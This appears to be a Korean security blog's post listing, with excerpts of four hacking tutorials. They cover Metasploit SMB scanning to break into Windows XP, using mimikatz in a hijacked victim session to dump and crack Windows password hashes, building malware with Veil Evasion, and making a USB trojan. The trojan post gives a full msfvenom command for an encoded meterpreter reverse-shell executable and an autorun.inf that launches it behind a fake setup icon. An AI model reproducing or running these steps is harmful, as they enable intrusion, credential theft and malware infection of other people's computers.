본문 바로가기

분류 전체보기257

SMB 타겟 스캐닝 및 해당 취약점으로 윈 xp 해킹 SMB-Server Message Block 으로 윈도우의 해킹 취약점중 하나입니다. MSF를 사용하여 SMB 취약점을 스캐닝하고 해당 취약부분으로 해킹이 가능해집니다. [사용법 및 명령어] service postgresql start msfconsole use scanner/smb/smb_version - smb_version 모듈을 사용해 스캐닝합니다. show options를 이용해서 설정할 옵션들을 확인합니다. set rhosts [스캐닝할 네트워크 범위] - remote host를 스캐닝합니다. ex)192.168.0.0/24 는 192.168.0 네트워크를 스캐닝한다는 의미이겠죠? set threads 40 - 사양에 따라 숫자를 맞추시면 됩니다. 높을수록 스캐닝이 빨라집니다. 사양이 낮으면 .. 2023. 12. 27.
mimikatz를 사용해서 윈도우 패스워드 알아내기 mimikatz는 미터프리터의 확장모듈입니다. 이는 윈도우 7,8,10 모두 적용이 될 수 있습니다. 우선 피해자의 컴퓨터가 해킹되어 세션이 잡힌 상태라고 가정합니다. [명령어 및 사용법] sessions -i [세션id] - 세션에 접속합니다. load mimikatz - mimikatz를 불러옵니다. help - mimikatz의 동작법을 볼수 있습니다. msv - 윈도우 계정에 해당하는 비밀번호의 해시값을 가져옵니다. [lm해시,ntlm해시] Administrator 와 같이 어드민 계정에 대한 password에 ntlm 해시값을 복사해 줍니다. 그 후, 아래의 사이트에 접속해줍니다. 해시값을 크래킹해 줄 수 있는 사이트입니다. https://crackstation.net/ CrackStation .. 2023. 12. 27.
Veil Evasion 악성코드 만들기 + rdesktop 원격조종 Veil Evasion은 Veil 프레임워크에서 사용할수 있는 악성코드 제작 도구입니다. https://github.com/Veil-Framework/Veil GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime) Veil 3.1.X (Check version info in Veil at runtime) - GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime) github.com 위 페이지에서 git clone으로 받아서 사용하시면 됩니다. [명령어 및 사용법] Veil 폴더에 가서 ./Veil.py로 실행 >use 1 - E.. 2023. 12. 27.
USB 트로이목마 만들기 1.악성코드 생성 # msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.8 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > virus.exe -a : 아키텍처 -platform : 운영체제 선택 -p : 페이로드 선택 LHOST,LPORT : 내부 아이피와 포트 [본인에 맞게 설정] -e : 인코딩 -b : bad character [\x00을 제외하고 인코딩 해라] -i : 인코딩 횟수 -f : 파일 확장자명 2.autorun.inf 작성 [AutoRun] OPEN=virus.EXE // 오픈할 파일 선택 ICON=setup.exe,0 // USB.. 2023. 12. 27.